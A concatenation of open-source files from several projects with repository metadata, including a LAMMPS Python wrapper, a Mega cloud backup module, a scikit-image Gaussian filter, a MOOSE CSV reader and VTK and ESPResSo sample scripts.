if len(self.runs) > 0:
return self.runs[-1]
return None
@property
def atoms(self):
return AtomList(self)
@property
def system(self):
output = self.info("system")
d = self._parse_info_system(output)
return namedtuple('System', d.keys())(*d.values())
@property
def communication(self):
output = self.info("communication")
d = self._parse_info_communication(output)
return namedtuple('Communication', d.keys())(*d.values())
@property
def computes(self):
output = self.info("computes")
return self._parse_element_list(output)
@property
def dumps(self):
output = self.info("dumps")
return self._parse_element_list(output)
@property
def fixes(self):
output = self.info("fixes")
return self._parse_element_list(output)
@property
def groups(self):
output = self.info("groups")
return self._parse_groups(output)
@property
def variables(self):
output = self.info("variables")
vars = {}
for v in self._parse_element_list(output):
vars[v['name']] = Variable(self, v['name'], v['style'], v['def'])
return vars
def eval(self, expr):
value = self.lmp_print('"$(%s)"' % expr).strip()
try:
return float(value)
except ValueError:
return value
def _split_values(self, line):
return [x.strip() for x in line.split(',')]
def _get_pair(self, value):
return [x.strip() for x in value.split('=')]
def _parse_info_system(self, output):
lines = output[6:-2]
system = {}
for line in lines:
if line.startswith("Units"):
system['units'] = self._get_pair(line)[1]
elif line.startswith("Atom style"):
system['atom_style'] = self._get_pair(line)[1]
elif line.startswith("Atom map"):
system['atom_map'] = self._get_pair(line)[1]
elif line.startswith("Atoms"):
parts = self._split_values(line)
system['natoms'] = int(self._get_pair(parts[0])[1])
system['ntypes'] = int(self._get_pair(parts[1])[1])
system['style'] = self._get_pair(parts[2])[1]
elif line.startswith("Kspace style"):
system['kspace_style'] = self._get_pair(line)[1]
elif line.startswith("Dimensions"):
system['dimensions'] = int(self._get_pair(line)[1])
elif line.startswith("Orthogonal box"):
system['orthogonal_box'] = [float(x) for x in self._get_pair(line)[1].split('x')]
elif line.startswith("Boundaries"):
system['boundaries'] = self._get_pair(line)[1]
elif line.startswith("xlo"):
keys, values = [self._split_values(x) for x in self._get_pair(line)]
for key, value in zip(keys, values):
system[key] = float(value)
elif line.startswith("ylo"):
keys, values = [self._split_values(x) for x in self._get_pair(line)]
for key, value in zip(keys, values):
system[key] = float(value)
elif line.startswith("zlo"):
keys, values = [self._split_values(x) for x in self._get_pair(line)]
for key, value in zip(keys, values):
system[key] = float(value)
elif line.startswith("Molecule type"):
system['molecule_type'] = self._get_pair(line)[1]
elif line.startswith("Bonds"):
parts = self._split_values(line)
system['nbonds'] = int(self._get_pair(parts[0])[1])
system['nbondtypes'] = int(self._get_pair(parts[1])[1])
system['bond_style'] = self._get_pair(parts[2])[1]
elif line.startswith("Angles"):
parts = self._split_values(line)
system['nangles'] = int(self._get_pair(parts[0])[1])
system['nangletypes'] = int(self._get_pair(parts[1])[1])
system['angle_style'] = self._get_pair(parts[2])[1]
elif line.startswith("Dihedrals"):
parts = self._split_values(line)
system['ndihedrals'] = int(self._get_pair(parts[0])[1])
system['nangletypes'] = int(self._get_pair(parts[1])[1])
system['dihedral_style'] = self._get_pair(parts[2])[1]
elif line.startswith("Impropers"):
parts = self._split_values(line)
system['nimpropers'] = int(self._get_pair(parts[0])[1])
system['nimpropertypes'] = int(self._get_pair(parts[1])[1])
system['improper_style'] = self._get_pair(parts[2])[1]
return system
def _parse_info_communication(self, output):
lines = output[6:-3]
comm = {}
for line in lines:
if line.startswith("MPI library"):
comm['mpi_version'] = line.split(':')[1].strip()
elif line.startswith("Comm style"):
parts = self._split_values(line)
comm['comm_style'] = self._get_pair(parts[0])[1]
comm['comm_layout'] = self._get_pair(parts[1])[1]
elif line.startswith("Processor grid"):
comm['proc_grid'] = [int(x) for x in self._get_pair(line)[1].split('x')]
elif line.startswith("Communicate velocities for ghost atoms"):
comm['ghost_velocity'] = (self._get_pair(line)[1] == "yes")
elif line.startswith("Nprocs"):
parts = self._split_values(line)
comm['nprocs'] = int(self._get_pair(parts[0])[1])
comm['nthreads'] = int(self._get_pair(parts[1])[1])
return comm
def _parse_element_list(self, output):
lines = output[6:-3]
elements = []
for line in lines:
element_info = self._split_values(line.split(':')[1].strip())
element = {'name': element_info[0]}
for key, value in [self._get_pair(x) for x in element_info[1:]]:
element[key] = value
elements.append(element)
return elements
def _parse_groups(self, output):
lines = output[6:-3]
groups = []
group_pattern = re.compile(r"(?P<name>.+) \((?P<type>.+)\)")
for line in lines:
m = group_pattern.match(line.split(':')[1].strip())
group = {'name': m.group('name'), 'type': m.group('type')}
groups.append(group)
return groups
def lmp_print(self, s):
""" needed for Python2 compatibility, since print is a reserved keyword """
return self.__getattr__("print")(s)
def __getattr__(self, name):
def handler(*args, **kwargs):
cmd_args = [name] + [str(x) for x in args]
with OutputCapture() as capture:
self.command(' '.join(cmd_args))
output = capture.output
if 'verbose' in kwargs and kwargs['verbose']:
print(output)
lines = output.splitlines()
if len(lines) > 1:
return lines
elif len(lines) == 1:
return lines[0]
return None
return handler
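# Added illustration (not in the original wrapper): through __getattr__ above,
# unknown attributes become LAMMPS commands, so scripts read like input files.
# Requires a working liblammps; the commands below are arbitrary examples.
def _example_pylammps_dispatch():
  L = PyLammps()
  L.units("lj")           # dispatched as the input-script line: units lj
  L.atom_style("atomic")  # dispatched as: atom_style atomic
  return L.version()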
class IPyLammps(PyLammps):
"""
iPython wrapper for LAMMPS which adds embedded graphics capabilities
"""
def __init__(self,name="",cmdargs=None,ptr=None,comm=None):
super(IPyLammps, self).__init__(name=name,cmdargs=cmdargs,ptr=ptr,comm=comm)
def image(self, filename="snapshot.png", group="all", color="type", diameter="type",
size=None, view=None, center=None, up=None, zoom=1.0):
cmd_args = [group, "image", filename, color, diameter]
if size:
width = size[0]
height = size[1]
cmd_args += ["size", width, height]
if view:
theta = view[0]
phi = view[1]
cmd_args += ["view", theta, phi]
if center:
flag = center[0]
Cx = center[1]
Cy = center[2]
Cz = center[3]
cmd_args += ["center", flag, Cx, Cy, Cz]
if up:
Ux = up[0]
Uy = up[1]
Uz = up[2]
cmd_args += ["up", Ux, Uy, Uz]
if zoom:
cmd_args += ["zoom", zoom]
cmd_args.append("modify backcolor white")
self.write_dump(*cmd_args)
from IPython.core.display import Image
return Image('snapshot.png')
def video(self, filename):
from IPython.display import HTML
return HTML("<video controls><source src=\"" + filename + "\"></video>")
|
epfl-cosmo/lammps
|
python/lammps.py
|
Python
|
gpl-2.0
| 29,726
|
[
"LAMMPS"
] |
2ae700a82a79748f2d7e939d6804c980df39cd963d4aab1198d16599cc77179a
|
from core import settings, uploader, filesystem
from core.logger import log
import os
class Backup(object):
"""
Class used to make a backup, in other words, the "kernel".
"""
def __init__(self, backup_path):
"""
        Constructor. It uses the settings file.
"""
self.recursive = True
self.backup_path = backup_path
self.uploader = uploader.UploaderMega()
self.actual_filesystem = filesystem.FileSystem(
initial_path=backup_path)
self.remote_filesystem = None
# Modes
self.initial_backup_mode = False
self.remote_home_mode = False
self.resync_mode = False
self.unknown_mode = False
def detect_mode(self):
"""
        Depending on the remote repository and the local folder, this method
        decides the backup mode.
"""
        #Initial backup: when nothing exists yet in Mega.
        #Resync: when Mega has content and the local home does too.
        #Remote-home: when Mega has content and the local folder is empty
        #or doesn't exist.
remote = self.uploader.find_folder(
settings.get_config('remote', 'folder'))
summary = self.uploader.get_file(
filename=settings.get_config('remote','summary_file'),
path=settings.get_config('remote', 'folder'))
empty_dir = filesystem.os_empty_dir(self.backup_path)
if remote and summary and empty_dir: #(000)
log.debug("REMOTE HOME 1")
self.remote_home_mode = True
elif remote and summary and not empty_dir: #(001)
log.debug("RESYNC 1")
self.resync_mode = True
elif remote and not summary and empty_dir: #(010)
log.debug("UNKNOWN MODE 1")
self.unknown_mode = True
elif remote and not summary and not empty_dir: #(011)
log.debug("INITIAL BACKUP 1")
self.initial_backup_mode = True
elif not remote and summary and empty_dir: #(100)
#Impossible
log.debug("UNKNOWN MODE 2")
self.unknown_mode = True
elif not remote and summary and not empty_dir: #(101)
#Impossible
log.debug("UNKNOWN MODE 3")
self.unknown_mode = True
elif not remote and not summary and empty_dir: #(110)
log.critical("Local directory doesn't exist and remote neither")
print "Local directory doesn't exist & remote neither, existing..."
log.debug("UNKNOWN MODE 4")
self.unknown_mode = True
elif not remote and not summary and not empty_dir: #(111)
log.debug("INITIAL BACKUP 2")
self.initial_backup_mode = True
def run(self, options=None):
"""
This method is the main function in this class.
Pre:
- Previous execution of detect_mode() method.
Return:
None
"""
if self.initial_backup_mode:
log.info("INITIAL BACKUP MODE")
log.debug("0 - READY BACKUP")
self.prepare_to_init_backup()
log.debug("2 - GENERATE ACTUAL FS")
self.actual_filesystem.generate()
log.debug("5.5 - UPLOAD ALL LOCAL FS")
self.upload_all()
log.debug("6 - UPDATE REMOTE FS")
self.upload_actual_fs_struct()
elif self.remote_home_mode:
log.info("REMOTE_HOME MODE")
log.debug("1 - LOAD REMOTE FS")
self.get_remote_fs_struct()
log.debug("2 - SYNC REMOTE HOME")
self.sync_remote_home()
elif self.resync_mode: # Reprocess
log.info("RESYNC")
log.debug("1 - LOAD REMOTE FS")
self.get_remote_fs_struct()
log.debug("2 - GENERATE ACTUAL FS")
self.actual_filesystem.generate()
log.debug("3,4 - CALCULATE CHANGES")
changes = filesystem.compare_fs(actual_fs=self.actual_filesystem,
old_fs=self.remote_filesystem)
log.debug("5 - APPLY DIFERENCES (DELETE/DOWNLOAD AND UPLOAD)")
self.process_changes_in_remote(changes)
log.debug("6 - UPDATE REMOTE FS")
self.upload_actual_fs_struct()
else:
log.critical("UNKNOWN MODE, existing...")
def upload_all(self):
"""
Upload a complete local FileSystem
Pre:
- self.actual_filesystem is set. This is possible, calling the
method filesystem.generate()
Return:
None
"""
for file in self.actual_filesystem.files:
if file.type == filesystem.FOLDER:
if file.relative_path == '/':
file.relative_path = ''
remote_folder = os.path.join(
settings.get_config('remote', 'folder'),
file.relative_path,
file.name)
rem_desc = self.uploader.mkdir(remote_folder)
file.remote_desc = rem_desc
elif file.type == filesystem.FILE:
remote_folder = '%s/%s' % (
settings.get_config('remote', 'folder'),
file.relative_path)
rem_desc = self.uploader.upload(remote_folder, file.path)
file.remote_desc = rem_desc
def prepare_to_init_backup(self):
"""
        This method prepares the remote folder (in Mega) for making a backup.
"""
self.uploader.mkdir(settings.get_config('remote', 'folder'))
def process_changes_in_remote(self, changes):
"""
        This method applies the computed changes in Mega (synchronize).
"""
log.debug("Processing changes in remote")
remove_files = changes['removed_files']
for file in remove_files:
log.debug("Removing file %s" % file)
status = self.uploader.remove(
path='%s/%s' % (settings.get_config('remote', 'folder'),
file.relative_path),
filename=file.name)
if not status:
log.error("ERROR DELETING REMOTE FILE %s" % file)
remove_folders = changes['removed_folders']
for folder in remove_folders:
log.debug("Removing folder %s" % folder)
status = self.uploader.remove(
path='%s/%s' % (settings.get_config('remote', 'folder'),
folder.relative_path),
filename=folder.name)
if not status:
log.error("Folder not deleted correctly in remote %s" % folder)
new_folders = changes['new_folders']
for folder in new_folders:
log.debug("Creating remote folder %s" % folder)
remote_folder = '%s/%s/%s' % (
settings.get_config('remote', 'folder'),
folder.relative_path,
folder.name)
rem_desc = self.uploader.mkdir(remote_folder)
new_files = changes['new_files']
for file in new_files:
log.debug("New file %s" % file)
remote_folder = '%s/%s' % (settings.get_config('remote', 'folder'),
file.relative_path)
rem_desc = self.uploader.upload(remote_folder, file.path)
to_download = changes['to_download']
for file in to_download:
log.debug("Download modified %s" % file)
path = '%s/%s' % (settings.get_config('remote', 'folder'),
file.relative_path)
content = self.uploader.get_content_by_path(path=path,
filename=file.name)
filesystem.create_file(
path=os.path.join(
self.backup_path,
file.relative_path),
name=file.name,
content=content)
new_files = changes['to_upload']
for file in new_files:
log.debug("Uploading file %s" % file)
remote_folder = '%s/%s' % (settings.get_config('remote', 'folder'),
file.relative_path)
rem_desc = self.uploader.upload(remote_folder, file.path)
def upload_actual_fs_struct(self):
self.actual_filesystem.dump_to_file('fs.dmp')
rem_desc = self.uploader.upload_raw(
path=settings.get_config('remote', 'folder'),
filename=settings.get_config('remote', 'summary_file'),
raw=self.actual_filesystem.get_dump())
return rem_desc
def get_remote_fs_struct(self):
file_desc = self.uploader.get_file(
filename=settings.get_config('remote', 'summary_file'),
path=settings.get_config('remote', 'folder'))
fs_descriptor = self.uploader.get_content_descriptor(
file_info=file_desc)
#print "DESCARGADO"
self.remote_filesystem = filesystem.load_filesystem_descriptor(
fs_descriptor)
def sync_remote_home(self):
#We have remote FS, then...
for file in self.remote_filesystem.files:
if file.relative_path == '/':
file.relative_path = ''
if file.type == filesystem.FILE: #Else, folder
path = '%s/%s' % (settings.get_config('remote', 'folder'),
file.relative_path)
content = self.uploader.get_content_by_path(path=path,
filename=file.name)
filesystem.create_file(
path=os.path.join(
self.backup_path,
file.relative_path),
name=file.name,
content=content)
elif file.type == filesystem.FOLDER:
path = os.path.join(self.backup_path,
file.relative_path,
file.name)
filesystem.os_mkdir(path)
def visit_path(self):
#Deprecated?
"""
Visit path and create summary file in binary
"""
log.critical("RUNNING, DEPRECATED")
level = 0
        for root, subfolders, files in os.walk(self.backup_path):
#print root
if not level:
actual_remote_folder = settings.get_config('remote', 'folder')
else:
actual_remote_folder = '%s/%s' % \
(actual_remote_folder, root.split('/')[-1])
            #For each file
            for fil in files:
                #print "UPLOADING %s to %s" % (fil, actual_remote_folder)
                file_path = os.path.join(root, fil)
                #print "SOURCE %s" % file_path
                #print file_path
                rem_desc = self.uploader.upload(actual_remote_folder, file_path)
            #For each subfolder
            for subfolder in subfolders:
                #print "CREATING folder %s" % (actual_remote_folder + '/' + subfolder)
folder = os.path.join(actual_remote_folder, subfolder)
rem_desc = self.uploader.mkdir(folder)
level += 1
#print root
#print files
#print subfolders
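# Added illustration (not in the original module): the expected call sequence
# per the docstrings above; the local backup path is hypothetical.
def _example_backup_run():
    backup = Backup('/home/user/backup')  # hypothetical local folder
    backup.detect_mode()                  # must run before run()
    backup.run()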
|
plutec/megup
|
core/backup.py
|
Python
|
gpl-2.0
| 11,984
|
[
"VisIt"
] |
0aab3e6feca634d0accf1ec3567ade3ac576f8b9042816d1dbe4e98c56a21622
|
import collections as coll
import numpy as np
from scipy import ndimage
import warnings
from ..util import img_as_float
from ..color import guess_spatial_dimensions
__all__ = ['gaussian_filter']
def gaussian_filter(image, sigma, output=None, mode='nearest', cval=0,
multichannel=None):
"""Multi-dimensional Gaussian filter
Parameters
----------
image : array-like
input image (grayscale or color) to filter.
sigma : scalar or sequence of scalars
standard deviation for Gaussian kernel. The standard
deviations of the Gaussian filter are given for each axis as a
sequence, or as a single number, in which case it is equal for
all axes.
output : array, optional
The ``output`` parameter passes an array in which to store the
filter output.
mode : {'reflect', 'constant', 'nearest', 'mirror', 'wrap'}, optional
The `mode` parameter determines how the array borders are
handled, where `cval` is the value when mode is equal to
'constant'. Default is 'nearest'.
cval : scalar, optional
Value to fill past edges of input if `mode` is 'constant'. Default
is 0.0
multichannel : bool, optional (default: None)
Whether the last axis of the image is to be interpreted as multiple
channels. If True, each channel is filtered separately (channels are
not mixed together). Only 3 channels are supported. If `None`,
the function will attempt to guess this, and raise a warning if
ambiguous, when the array has shape (M, N, 3).
Returns
-------
filtered_image : ndarray
the filtered array
Notes
-----
This function is a wrapper around :func:`scipy.ndimage.gaussian_filter`.
Integer arrays are converted to float.
The multi-dimensional filter is implemented as a sequence of
one-dimensional convolution filters. The intermediate arrays are
stored in the same data type as the output. Therefore, for output
types with a limited precision, the results may be imprecise
because intermediate results may be stored with insufficient
precision.
Examples
--------
>>> a = np.zeros((3, 3))
>>> a[1, 1] = 1
>>> a
array([[ 0., 0., 0.],
[ 0., 1., 0.],
[ 0., 0., 0.]])
>>> gaussian_filter(a, sigma=0.4) # mild smoothing
array([[ 0.00163116, 0.03712502, 0.00163116],
[ 0.03712502, 0.84496158, 0.03712502],
[ 0.00163116, 0.03712502, 0.00163116]])
    >>> gaussian_filter(a, sigma=1) # more smoothing
array([[ 0.05855018, 0.09653293, 0.05855018],
[ 0.09653293, 0.15915589, 0.09653293],
[ 0.05855018, 0.09653293, 0.05855018]])
>>> # Several modes are possible for handling boundaries
>>> gaussian_filter(a, sigma=1, mode='reflect')
array([[ 0.08767308, 0.12075024, 0.08767308],
[ 0.12075024, 0.16630671, 0.12075024],
[ 0.08767308, 0.12075024, 0.08767308]])
>>> # For RGB images, each is filtered separately
>>> from skimage.data import astronaut
>>> image = astronaut()
>>> filtered_img = gaussian_filter(image, sigma=1, multichannel=True)
"""
spatial_dims = guess_spatial_dimensions(image)
if spatial_dims is None and multichannel is None:
msg = ("Images with dimensions (M, N, 3) are interpreted as 2D+RGB "
"by default. Use `multichannel=False` to interpret as "
"3D image with last dimension of length 3.")
warnings.warn(RuntimeWarning(msg))
multichannel = True
if multichannel:
# do not filter across channels
if not isinstance(sigma, coll.Iterable):
sigma = [sigma] * (image.ndim - 1)
if len(sigma) != image.ndim:
sigma = np.concatenate((np.asarray(sigma), [0]))
image = img_as_float(image)
return ndimage.gaussian_filter(image, sigma, mode=mode, cval=cval)
|
bennlich/scikit-image
|
skimage/filters/_gaussian.py
|
Python
|
bsd-3-clause
| 3,998
|
[
"Gaussian"
] |
62e548eb8727a122de0390ca7594fd20e7ba8b3309c340e42ed99e01c10f5af1
|
import os
import cdo
cdo = cdo.Cdo()
def split(name):
""" Returns the name of a file without the directory path
"""
path, filename = os.path.split(name)
return filename
def sample(ifile, **kwargs):
print 'called external function'
return ifile
def field_integral(ifile, **kwargs):
out = 'netcdf/field-integral_' + split(ifile)
fout = 'netcdf/gridarea_' + split(ifile)
mout = 'netcdf/mul_' + split(ifile)
ymean = 'netcdf/yrmean' + split(out)
cdo.gridarea(input=ifile, output=fout)
cdo.mul(input=ifile + ' ' + fout, output=mout)
cdo.fldsum(input=mout, output=out)
cdo.yearmean(input=out, output=ymean)
return ymean
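# Added illustration (not in the original module): field_integral() chains
# cdo gridarea -> mul -> fldsum -> yearmean; the input path is hypothetical.
def _example_field_integral():
    return field_integral('netcdf/tas_sample.nc')  # returns the yearmean path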
|
fallisd/validate
|
validate/functions/external.py
|
Python
|
gpl-2.0
| 684
|
[
"NetCDF"
] |
ab7a48260f428f7e2b843d6323b5ecadb921380bbca1580212602706638ad59e
|
import os
from setuptools import setup
from pip.req import parse_requirements
# Utility function to read the README file. Used for the long_description.
# It's nice, because now 1) we have a top level README file and 2) it's easier
# to type in the README file than to put a raw string in below.
def read(fname):
with open(os.path.join(os.path.dirname(__file__), fname)) as f:
return f.read()
setup(
name="ceilometer-publisher-vaultaire",
version="0.0.21",
description="A publisher plugin for Ceilometer that outputs to Vaultaire",
author="Barney Desmond",
author_email="engineering@anchor.net.au",
url="https://github.com/anchor/ceilometer-publisher-vaultaire",
zip_safe=False,
packages=[
"ceilometer_publisher_vaultaire", # Does anyone know what this means?
],
package_data={
"ceilometer_publisher_vaultaire" : ["README.md"],
},
long_description=read("README"),
classifiers=[
"Development Status :: 3 - Alpha",
"Topic :: Utilities",
"License :: OSI Approved :: Apache Software License",
],
entry_points = {
"ceilometer.publisher": [
"vaultaire = ceilometer_publisher_vaultaire:VaultairePublisher",
],
},
install_requires=[str(req.req) for req in parse_requirements("requirements.txt")],
include_package_data=True
)
|
anchor/ceilometer-publisher-vaultaire
|
setup.py
|
Python
|
apache-2.0
| 1,372
|
[
"Desmond"
] |
f28f8952ee97e349f2c4bd6b0c89d686b0a5f9f1fd0bb48decf90132f4937903
|
#* This file is part of the MOOSE framework
#* https://www.mooseframework.org
#*
#* All rights reserved, see COPYRIGHT for full restrictions
#* https://github.com/idaholab/moose/blob/master/COPYRIGHT
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html
import os
import glob
import pandas
import bisect
from .MooseDataFrame import MooseDataFrame
from . import message
class VectorPostprocessorReader(object):
"""
A Reader for MOOSE VectorPostprocessor data.
Args:
pattern[str]: A pattern of files (for use with glob) for loading.
    MOOSE outputs VectorPostprocessor data in separate files for each timestep, using the timestep as
    a suffix. For example: file_000.csv, file_001.csv, etc.
Therefore, a pattern acceptable for use with the python glob package must be supplied. For the
above files, "file_*.csv" should be supplied.
This object manages the loading and unloading of data and should always be in a valid state,
regardless of the existence of a file. It will also append new data and remove old/deleted data
on subsequent calls to "update()".
"""
def __init__(self, pattern, run_start_time=0):
self._pattern = pattern
self._timedata = MooseDataFrame(self._pattern.replace('*', 'time'),
run_start_time=None,
index='timestep')
self._frames = dict()
self._time = -1
self._index = None
self._run_start_time = run_start_time
self.update()
@property
def data(self):
return self._frames.get(self._index, pandas.DataFrame())
@property
def filename(self):
if self._frames:
return self._frames[self._index].filename
def __getitem__(self, keys):
"""
Operator[] returns the data for the current time.
Args:
keys[str|list]: The key(s) to return.
"""
return self._frames[self._index][keys]
def __bool__(self):
"""
Allows this object to be used in boolean cases.
Example:
data = VectorPostprocessorReader('files_*.csv')
if not data:
                print('No data found!')
"""
return self._index in self._frames
def __contains__(self, variable):
"""
Returns true if the variable exists in the data structure.
"""
return variable in self._frames[self._index]
def times(self):
"""
Returns the list of available time indices contained in the data.
"""
return sorted(self._frames.keys())
def clear(self):
"""
Remove all data.
"""
self._frames = dict()
self._index = None
self._time = None
def variables(self):
"""
Return a list of postprocessor variable names listed in the reader.
"""
if self._index is not None:
return self._frames[self._index].data.columns.tolist()
def update(self, time=None):
"""
Update data by adding/removing files.
time[float]: The time at which the data should be returned.
"""
# Update the time
if time is not None:
self._time = time
# Update the time data file
self._timedata.update()
# The list of files from the supplied pattern
last_modified = 0.0
for fname in sorted(glob.glob(self._pattern)):
if fname.endswith('LATEST') or fname.endswith('FINAL') or (fname == self._timedata.filename):
continue
idx = self._timeHelper(fname)
mdf = self._frames.get(idx, None)
if mdf is None:
mdf = MooseDataFrame(fname, run_start_time=self._run_start_time, update=False,
peacock_index=True)
self._frames[idx] = mdf
# Clean up old and empty data
for idx in list(self._frames.keys()):
mdf = self._frames[idx]
mdf.update()
if mdf.empty():
self._frames.pop(idx)
elif (mdf.modified < last_modified):
self._frames.pop(idx)
elif mdf.filesize == 0:
self._frames.pop(idx)
else:
last_modified = mdf.modified
self.__updateCurrentIndex()
def repr(self):
"""
Return components for building script.
Returns:
(output, imports) The necessary script and include statements to re-create data load.
"""
imports = ['import mooseutils']
output = ['\n# Read VectorPostprocessor Data']
output += ['data = mooseutils.VectorPostprocessorReader({})'.format(repr(self._pattern))]
return output, imports
def _timeHelper(self, filename):
"""
Determine the time index. (protected)
"""
idx = filename.rfind('_') + 1
tstep = int(filename[idx:-4])
if not self._timedata:
return tstep
else:
try:
return self._timedata['time'].loc[tstep]
except Exception:
return tstep
def __updateCurrentIndex(self):
"""
Helper for setting the current key for the supplied time.
"""
if not self._frames:
index = None
# Return the latest time
elif self._time == -1:
index = self.times()[-1]
# Return the specified time
elif self._time in self._frames:
index = self._time
# Find nearest time
else:
times = self.times()
n = len(times)
idx = bisect.bisect_right(times, self._time) - 1
if idx < 0:
idx = 0
elif idx > n:
idx = -1
index = times[idx]
self._index = index
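# Added illustration (not part of the original module): typical use of the
# reader per the class docstring above; the file pattern and time are made up.
def _example_reader_usage():
    reader = VectorPostprocessorReader('file_*.csv')  # hypothetical pattern
    reader.update(time=1.0)        # select the frame nearest t = 1.0
    if reader:
        return reader.variables()  # postprocessor column names
    return None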
|
harterj/moose
|
python/mooseutils/VectorPostprocessorReader.py
|
Python
|
lgpl-2.1
| 5,970
|
[
"MOOSE"
] |
ac4caabd3ea0a5a58dcf7019b6491539f991dd74cecafe428a8c0cccd663f327
|
#!/usr/bin/env python
import vtk
disk = vtk.vtkDiskSource()
disk.SetRadialResolution(2)
disk.SetCircumferentialResolution(9)
clean = vtk.vtkCleanPolyData()
clean.SetInputConnection(disk.GetOutputPort())
clean.SetTolerance(0.01)
piece = vtk.vtkExtractPolyDataPiece()
piece.SetInputConnection(clean.GetOutputPort())
extrude = vtk.vtkPLinearExtrusionFilter()
extrude.SetInputConnection(piece.GetOutputPort())
extrude.PieceInvariantOn()
# Create the RenderWindow, Renderer and both Actors
#
ren1 = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(extrude.GetOutputPort())
mapper.SetNumberOfPieces(2)
mapper.SetPiece(1)
bf = vtk.vtkProperty()
bf.SetColor(1,0,0)
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetColor(1,1,0.8)
actor.SetBackfaceProperty(bf)
# Add the actors to the renderer, set the background and size
#
ren1.AddActor(actor)
ren1.SetBackground(0.1,0.2,0.4)
renWin.SetSize(300,300)
# render the image
#
cam1 = ren1.GetActiveCamera()
cam1.Azimuth(20)
cam1.Elevation(40)
ren1.ResetCamera()
cam1.Zoom(1.2)
iren.Initialize()
# prevent the tk window from showing up then start the event loop
# --- end of script --
|
ashray/VTK-EVM
|
Filters/Parallel/Testing/Python/TestExtrudePiece.py
|
Python
|
bsd-3-clause
| 1,283
|
[
"VTK"
] |
e31861d713b994880af03c49fbc13b2f7de2a1caecf954cdcf2803915345b4d3
|
# Copyright (C) 2010-2018 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
""" Visualization of shape-based constraints with test particles.
"""
from __future__ import print_function
from threading import Thread
import numpy as np
import espressomd
import espressomd.shapes
import espressomd.visualization_opengl
required_features = ["LENNARD_JONES"]
espressomd.assert_features(required_features)
box_l = 50
system = espressomd.System(box_l=[50.0] * 3)
system.set_random_state_PRNG()
np.random.seed(seed=system.seed)
system.time_step = 0.0001
system.cell_system.skin = 0.3
visualizer = espressomd.visualization_opengl.openGLLive(
system, background_color=[1, 1, 1], drag_enabled=True, rasterize_resolution=50.0,
rasterize_pointsize=5, camera_position=[150, 25, 25], camera_right=[0, 0, -1])
# Wall
# system.constraints.add(shape=espressomd.shapes.Wall(dist=20, normal=[0.1, 0.0, 1]),
# particle_type=0, penetrable=True)
# Sphere
# system.constraints.add(shape=espressomd.shapes.Sphere(center=[25, 25, 25], radius=15,
# direction=1), particle_type=0, penetrable=True)
# Ellipsoid
# system.constraints.add(shape=espressomd.shapes.Ellipsoid(center=[25, 25, 25], a=25, b=15,
# direction=1), particle_type=0, penetrable=True)
# Cylinder
# system.constraints.add(shape=espressomd.shapes.Cylinder(center=[25, 25, 25], axis=[1, 0,
# 0], direction=1, radius=10, length=30), particle_type=0,
# penetrable=True)
# SpheroCylinder
# system.constraints.add(shape=espressomd.shapes.SpheroCylinder(center=[25, 25, 25],
# axis=[1, 0, 0], direction=1, radius=10, length=30), particle_type=0,
# penetrable=True)
# Maze
# system.constraints.add(shape=espressomd.shapes.Maze(cylrad=3, dim=2, nsphere=2, sphrad=8),
# particle_type=0, penetrable=True)
# Stomatocyte
# system.constraints.add(shape=espressomd.shapes.Stomatocyte(inner_radius=3, outer_radius=7,
# axis=[1.0, 0.0, 0.0], center=[25, 25, 25], layer_width=3, direction=1),
# particle_type=0, penetrable=True)
# SimplePore
system.constraints.add(shape=espressomd.shapes.SimplePore(center=[25, 25, 25], axis=[
1, 0, 0], length=15, radius=12.5, smoothing_radius=2), particle_type=0, penetrable=True)
# Slitpore
# system.constraints.add(shape=espressomd.shapes.Slitpore(channel_width=15,
# lower_smoothing_radius=3, upper_smoothing_radius=3, pore_length=20,
# pore_mouth=30, pore_width=5), particle_type=0, penetrable=True)
# HollowCone
# system.constraints.add(shape=espressomd.shapes.HollowCone(inner_radius=5, outer_radius=20,
# opening_angle=np.pi/4.0, axis=[1.0, 0.0, 0.0], center=[25, 25, 25],
# width=2, direction=1), particle_type=0, penetrable=True)
system.thermostat.set_langevin(kT=10.0, gamma=10)
for i in range(100):
rpos = np.random.random(3) * box_l
system.part.add(pos=rpos, type=1)
system.non_bonded_inter[1, 1].lennard_jones.set_params(
epsilon=1.0, sigma=5.0,
cutoff=15.0, shift="auto")
system.non_bonded_inter[0, 1].lennard_jones.set_params(
epsilon=200.0, sigma=5.0,
cutoff=20.0, shift="auto")
system.force_cap = 1000.0
visualizer.run(1)
|
hmenke/espresso
|
samples/visualization_constraints.py
|
Python
|
gpl-3.0
| 3,725
|
[
"ESPResSo"
] |
6cd381761483cb51878463040f277c17a864e3f7f8f438304faa4246dab8d8bf
|
from ddapp import objectmodel as om
from ddapp import affordanceitems
from ddapp import lcmobjectcollection
from ddapp import visualization as vis
from ddapp.timercallback import TimerCallback
from ddapp.uuidutil import newUUID
from ddapp import vtkAll as vtk
from ddapp.thirdparty import numpyjsoncoder
import traceback
class AffordanceObjectModelManager(object):
def __init__(self, view):
self.collection = lcmobjectcollection.LCMObjectCollection(channel='AFFORDANCE_COLLECTION_COMMAND')
self.collection.connectDescriptionUpdated(self._onDescriptionUpdated)
self.collection.connectDescriptionRemoved(self._onDescriptionRemoved)
self.view = view
self.notifyFrequency = 30 # throttle lcm messages per second sent for affordance updates
self._ignoreChanges = False
self._pendingUpdates = set()
self.timer = TimerCallback()
self.timer.callback = self._notifyPendingUpdates
self.affordanceUpdater = None
def setAffordanceUpdater(self, affordanceUpdater):
self.affordanceUpdater = affordanceUpdater
def getAffordances(self):
return [obj for obj in om.getObjects() if isinstance(obj, affordanceitems.AffordanceItem)]
def getCollisionAffordances(self):
affs = []
for aff in self.getAffordances():
if aff.getProperty('Collision Enabled'):
affs.append(aff)
return affs
def getAffordanceId(self, aff):
return aff.getProperty('uuid')
